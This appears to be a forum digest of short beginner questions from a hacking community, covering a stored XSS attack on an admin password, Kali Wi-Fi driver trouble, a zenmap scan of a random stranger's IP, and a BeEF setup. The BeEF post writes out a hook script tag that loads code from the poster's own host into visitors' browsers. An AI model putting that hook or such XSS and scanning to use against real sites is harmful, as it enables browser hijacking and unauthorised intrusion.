Hey Null Byte Community, i recently read about the Stored XSS exploit(Details) and wanted to test it myself by changing the Admin pw. However, i don't know which js script i should use to achive it. -BitScythe
I recently bought the AWUS036NHR v2 and it worked with windows. But after i tried it in Kali(on my vm and from a live usb) the adapter didn't showed up. If i try to install new driver i get a bunch of error messages like /root/Desktop/RTL8188C8192CUSBlinuxv4.0.29000.20130911 ...more
I just ran a scan with zenmap on a random ip i found somewhere. Then , the Topology showed me this : Im curious why there are so many.
So , i started recently reading the Posts on Null Byte and stumbled over BeEF . I tried to do it myself and made a very simple Site with: <script src="http://myip:3000/hook.js " type="text/javascript"></script> . However , it didnt connected and im feeling very dumb because it ...more